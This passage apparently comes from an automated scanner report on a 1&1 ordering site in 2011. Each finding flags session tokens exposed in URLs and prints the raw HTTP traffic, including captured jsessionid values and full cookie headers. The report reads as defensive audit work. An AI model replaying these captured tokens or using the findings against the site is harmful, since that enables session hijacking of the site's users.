Date: Sun, 20 Mar 2011 17:53:22 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1MjAwLy0rLTA=; Expires=Fri, 07-Apr-2079 21:07:29 GMT; Path=/
ETag: 9efbb6be51ecd3a77db1d7f5b7bc91f5
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63287


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=CloudDynamicServer&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=CloudDynamicServer&amp;page=switch&amp;linkOrigin=CloudDynamicServer&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.tab.vps" rel="button-hd-tab-vps"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.tab.serverpremium" rel="button-hd-tab-serverpremium"><span>
...[SNIP]...
<p>Mobile monitoring of your server availability any time with
<a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerMonitoringCloud;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff"><strong>
...[SNIP]...
<span class="osLinux"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerDedOsLinuxOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<span class="osWindows"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerDedOsWindowsOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerMonitoringCloud;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details
</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsPlesk;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerProcessor;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureControlCenter;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerDedOsLinux;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerDedOsWindows;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerDedOsWindowsOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerDedOsLinuxOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsSB;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsPlesk;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureControlCenter;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerRecovery;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerSsl;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerFirewall;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureFtpBackup;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureWebdesignIstock;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsMerchandise;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureFtpBackup;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
</ul><a rel="height=480, width=665" class="btn btn-detail-lightblue window-open" href="/xml/order/popupServerOsCds;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">
Details
</a>
...[SNIP]...
</p><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
</p><a rel="height=480, width=643" class="window-open" href="/xml/order/popupPayPalInfo;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
<p>*Offers valid for a limited time only. "3 Months Free" offer valid on the Base Configuration only, with a 12 month minimum contract term. Setup fee and other terms and conditions may apply. <a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=CloudDynamicServer&amp;linkOrigin=CloudDynamicServer&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=CloudDynamicServer&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.5. http://order.1and1.com/xml/order/CloudDynamicServer  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:22 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1MjAwLy0rLTA=; Expires=Fri, 07-Apr-2079 21:07:29 GMT; Path=/
ETag: 9efbb6be51ecd3a77db1d7f5b7bc91f5
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63287


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.6. http://order.1and1.com/xml/order/Contact  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Contact

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Contact;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.support HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:34:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Contact?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.support
Content-Length: 0
Connection: close
Content-Type: text/plain


3.7. http://order.1and1.com/xml/order/Domaininfo  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Domaininfo

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Domaininfo;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:37:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Domaininfo?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.8. http://order.1and1.com/xml/order/DomaininfoMove  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/DomaininfoMove

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/DomaininfoMove;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:23:36 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/DomaininfoMove?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domainTransfer
Content-Length: 0
Connection: close
Content-Type: text/plain


3.9. http://order.1and1.com/xml/order/Eshops  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:33:34 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Eshops?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce
Content-Length: 0
Connection: close
Content-Type: text/plain


3.10. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsChat

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/FeatureCommunicationToolsChat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
